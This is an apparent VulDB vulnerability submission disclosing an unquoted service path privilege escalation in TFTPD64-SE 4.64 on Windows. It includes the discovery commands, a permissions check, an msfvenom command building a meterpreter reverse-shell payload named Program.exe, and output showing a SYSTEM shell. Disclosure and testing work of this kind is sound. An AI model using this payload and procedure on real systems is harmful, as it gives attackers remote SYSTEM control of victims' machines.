Submit #88694: TFTPD64-SE Privilege Escalation (Unquoted Service Path)info

Title	TFTPD64-SE Privilege Escalation (Unquoted Service Path)
Description	Reporter: Anthony "RedHatAugust" Radzykewycz Download: https://bitbucket.org/phjounin/tftpd64/downloads/Tftpd64_SE-4.64-setup.exe Reached out to Developer: https://bitbucket.org/phjounin/tftpd64/issues/31/discovered-vulnerability-in-tftpd64 - no response Tested on Windows 10 and Windows 11 If Windows is misconfigured to allow a user to create files in the root directory, an executable named "Program.exe" can be placed under that directory and triggered by starting this service. Discovery: In a command prompt, enter the following: wmic service get name,pathname,displayname,startmode \| findstr /i auto \| findstr /i /v "C:\Windows\\" \| findstr /i /v """ Result: C:\Users\User>wmic service get name,pathname,displayname,startmode \| findstr /i auto \| findstr /i /v "C:\Windows\\" \| findstr /i /v """ Tftpd32 service edition Tftpd32_svc C:\Program Files\Tftpd64_SE\tftpd64_svc.exe Auto To Replicate: Ensure that user has write privileges in root directory C:\>icacls C:\ C:\ NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(M) NT AUTHORITY\SYSTEM:(OI)(CI)(F) BUILTIN\Administrators:(OI)(CI)(F) BUILTIN\Users:(OI)(CI)(RX,W) Mandatory Label\High Mandatory Level:(OI)(NP)(IO)(NW) Successfully processed 1 files; Failed processing 0 files Create a reverse shell $ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=6666 -f exe > Program.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 510 bytes Final size of exe file: 7168 bytes Create listener (steps skipped for brevity) Place Program.exe in C:\ Restart Windows host SYSTEM Shell msf6 exploit(multi/handler) > exploit [] Started reverse TCP handler on 192.168.0.192:6666 [] Sending stage (200774 bytes) to 192.168.0.149 [*] Meterpreter session 2 opened (192.168.0.192:6666 -> 192.168.0.149:49670) at 2023-02-13 11:04:19 -0700 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
User	RedHatAugust (UID 37704)
Submission	02/13/2023 19:06 (3 years ago)
Moderation	02/17/2023 09:20 (4 days later)
Status	Accepted
VulDB entry	221351 [phjounin TFTPD64-SE 4.64 tftpd64_svc.exe unquoted search path]
Points	17

◂ Previous Overview Next ▸

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!